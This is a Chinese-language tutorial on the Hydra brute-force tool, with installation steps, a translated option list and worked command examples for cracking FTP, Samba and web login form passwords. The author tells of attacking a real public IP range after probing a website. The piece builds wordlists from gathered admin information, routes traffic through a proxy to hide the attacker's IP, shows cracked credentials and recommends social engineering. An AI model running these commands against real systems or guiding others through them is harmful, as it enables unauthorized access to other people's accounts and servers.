hydra著名***組織thc的一款開源的暴力破解工具,可以破解多種密碼。其官網http://www.thc.org,本文測試版本爲最新版本5.8,可支持
TELNET, FTP, HTTP, HTTPS, HTTP-PROXY, SMB, SMBNT, MS-SQL, MYSQL,
REXEC,RSH, RLOGIN, CVS, SNMP, SMTP-AUTH, SOCKS5, VNC, POP3, IMAP,
NNTP, PCNFS,ICQ, SAP/R3, LDAP2, LDAP3, Postgres, Teamspeak,
Cisco auth, Cisco enable,AFP, LDAP2, Cisco AAA
等密碼破解。唯一覺得不大方便的是,用於密碼破解的字典必須我們自己製作指定
0x01安裝手記
cd到下載好的安裝程序目錄,解壓軟件包
sudo tar zxvf hydra-5.8-src.tar.gz
得到hydra-5.8-src文件夾,進入該文件夾,按照安裝說明首先進行配置
sudo ./configure
會檢測到當前系統一些組建配置,主要是對於破解支持模塊的檢測,大家根據需要安裝對應的支持庫和依賴包,在以後實戰過程我可能會提到
相關模塊。
直接繼續編譯,sudo make和sudo make install,這樣就安裝完成了。另外值得說明的是,該軟件支持GUI的人性化界面,個人不推薦,感興趣
的朋友可以到官網下載頁面查看。
0x02參數詳解(官網是英文,下面我翻譯成中文)
格式: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]
server service [OPT] # 可選的
-R 繼續從上一次進度接着破解
-S 採用SSL鏈接(大寫的S)
-s PORT 如果非默認端口,可通過這個參數指定
-l LOGIN 小寫,用於指定破解的用戶,對特定用戶破解
-L FILE 大寫,用於指定用戶的用戶名字典
-p PASS 小寫,用於指定密碼破解,少用,一般是採用密碼字典
-P FILE 大寫,用於指定密碼字典
-e ns 額外的選項,n:空密碼試探,s:使用指定賬戶和密碼試探
-C FILE 使用冒號分割格式 例如 "登錄名:密碼"來代替-L/-P參數
-M FILE 指定目標列表文件一行一條
-o FILE 指定結果輸出文件
-f 在使用-M參數以後找到第一對登錄名或者密碼的時候中止破解
-t TASKS 同時運行的線程數,默認爲16
-w TIME 設置最大超時的時間,單位秒,默認是30s
-v / -V 顯示詳細過程
server 目標ip
service 指定服務名,支持如下: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy
cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq
sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp
OPT 可選項
如何使用代理服務器進行破解(這一點主要處於***者的ip,處於自身安全考慮)
----------------------------
HYDRA_PROXY_HTTP 變量參數可以用來定義代理服務器(只能使用http代理)
語法:
HYDRA_PROXY_HTTP="http://ip:port/"
HYDRA_PROXY_CONNECT=ip:8000
如果你使用的代理需要用戶名和密碼,請使用HYDRA_PROXY_AUTH 變量參數:
HYDRA_PROXY_AUTH="the_login:the_password"
0x03實例破解
1.ftp密碼破解
結合自己實例,最近試探一個網站,得到了ftp用戶,是serv-u6.02但是無法破解密碼,我通過收集這些ftp用戶將結果保存在ftpuser.lst文件
中,同時通過收集各個網站的信息,包括管理員的信息組合形成一個密碼字典ftppwd.lst。於是,就開始嘗試破解,命令如下:
sudo hydra -L /home/dict/ftpuser.lst -P /home/dict/ftppwd.lst 218.86.103.* ftp
這個是基於多用戶密碼破解,另外還有一個本地ftp密碼破解方案。爲了效率我直接將密碼寫入到pwd.lst字典中
sudo hydra -l administrator -P /home/dict/pwd.lst -v 192.168.8.6 ftp
返回結果如下,成功破解了密碼:
# 該行說明任務總數,會根據你提供用戶名和密碼進行計算,l:1/p:2表示一個用戶名,密碼字典中又2個密碼
[DATA] 2 tasks, 1 servers, 2 login tries (l:1/p:2), ~1 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[STATUS] attack finished for 192.168.8.6 (waiting for childs to finish)
# 破解成功,直接顯示出來,當然你可以讓他輸出到文件,通過參數-o設定
[21][ftp] host: 192.168.8.6 login: administrator password: 123
通過這種方法有極大可能破解這個ftp,當然關鍵在於你的字典,我們可以通過字典生成器就可以很好的破解了。
2.samba密碼破解
利用nmap掃描到服務器開啓了samba服務,於是嘗試收集該服務器信息組合成密碼字典。由於該應用類似ftp破解,這裏不對具體演示,只是將
ftp服務改成smb服務即可。
3.網站後臺密碼破解
該軟件的強大之處就在於支持多種協議的破解,同樣他也支持對於web用戶界面的登錄破解,get方式提交的表單比較簡單,這裏通過post方式
提交密碼破解提供思路。該工具又一個不好的地方就是,如果目標網站登錄時候需要驗證碼無法破解了。帶參數破解如下:
<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>
假設有以上一個密碼登錄表單,我們執行命令:
sudo hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form
“index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”
# 破解的用戶名是admin,密碼字典是pass.lst,破解結果保存在ok.lst,-t是同時線程數爲1,-f是當破解了一個密碼就停止,ip是本地,就
是目標ip,http-post-form表示破解是採用http的post方式提交的表單密碼破解
後面參數是網頁中對應的表單字段的name屬性,後面<title>中的內容是表示錯誤猜解的返回信息提示,可以自定義。
0x04總結
該工具的強大隻有你自行體驗了,當然密碼能否破解關鍵在於你的字典。以上一些實例操作僅僅是提供的支持的衆多服務中的3種,其他的服務
也同樣非常強大,留給大家自行體會。其實密碼字典的生成有相關的工具,你可以自己生成符合一定規則的密碼字典。當然如果你是一個成功
的社工專家,往往能夠得到事半功倍的效果。